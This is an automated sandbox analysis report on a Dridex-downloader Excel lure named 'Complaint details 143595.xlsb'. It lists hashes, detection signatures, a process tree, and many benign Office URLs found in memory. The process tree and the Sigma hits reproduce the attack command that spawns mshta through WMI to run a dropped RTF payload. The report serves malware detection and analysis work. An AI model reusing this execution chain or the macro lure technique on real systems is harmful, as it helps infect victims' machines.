Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Complaint details 143595.xlsb

Overview

General Information

Sample Name:Complaint details 143595.xlsb
Analysis ID:532579
MD5:91eca239ee8b604f18f6fb1ed6cde135
SHA1:78c47637b513d11ba6c36b19b9d79f7ee7a86338
SHA256:4dea495d5c1c5e0cb56677608b5efa53658cc20bb836f9cccd2aa1092b573aa8
Tags:Dridexxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Sigma detected: TA505 Dropper Load Pattern
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Searches for the Microsoft Outlook file path
Yara detected Xls With Macro 4.0
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Launches processes in debugging mode, may be used to hinder debugging

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 2012 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 6632 cmdline: wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WmiPrvSE.exe (PID: 5268 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • mshta.exe (PID: 5716 cmdline: mshta C:\ProgramData\KBjfhfmoGRoN.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\KBjfhfmoGRoN.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: TA505 Dropper Load PatternShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: mshta C:\ProgramData\KBjfhfmoGRoN.rtf, CommandLine: mshta C:\ProgramData\KBjfhfmoGRoN.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 5268, ProcessCommandLine: mshta C:\ProgramData\KBjfhfmoGRoN.rtf, ProcessId: 5716
      Sigma detected: Suspicious MSHTA Process PatternsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: mshta C:\ProgramData\KBjfhfmoGRoN.rtf, CommandLine: mshta C:\ProgramData\KBjfhfmoGRoN.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 5268, ProcessCommandLine: mshta C:\ProgramData\KBjfhfmoGRoN.rtf, ProcessId: 5716
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2012, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf", ProcessId: 6632
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2012, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf", ProcessId: 6632

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: Complaint details 143595.xlsbReversingLabs: Detection: 37%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: EXCEL.EXE, 00000000.00000002.583502089.000000000DDE0000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
      Source: EXCEL.EXE, 00000000.00000002.583373256.000000000D861000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tablen
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: EXCEL.EXE, 00000000.00000003.307863159.0000000015756000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501871958.0000000015756000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.588123970.0000000015759000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388478696.000000001574E000.00000004.00000001.sdmpString found in binary or memory: http://www.w3.o
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticatedVZ2
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled:
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated4X
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticatedg
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: EXCEL.EXE, 00000000.00000003.300853930.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422493445.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388661476.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.308027619.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302273593.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390159352.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303250691.0000000012F80000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: EXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: EXCEL.EXE, 00000000.00000002.585225626.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500890406.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300853930.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422493445.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388661476.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.308027619.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453225659.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.501979106.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302273593.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390159352.0000000012F80000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303250691.0000000012F80000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apipS
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apirl
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechJ
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechU
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.aadrm.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appinfo/queryint
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
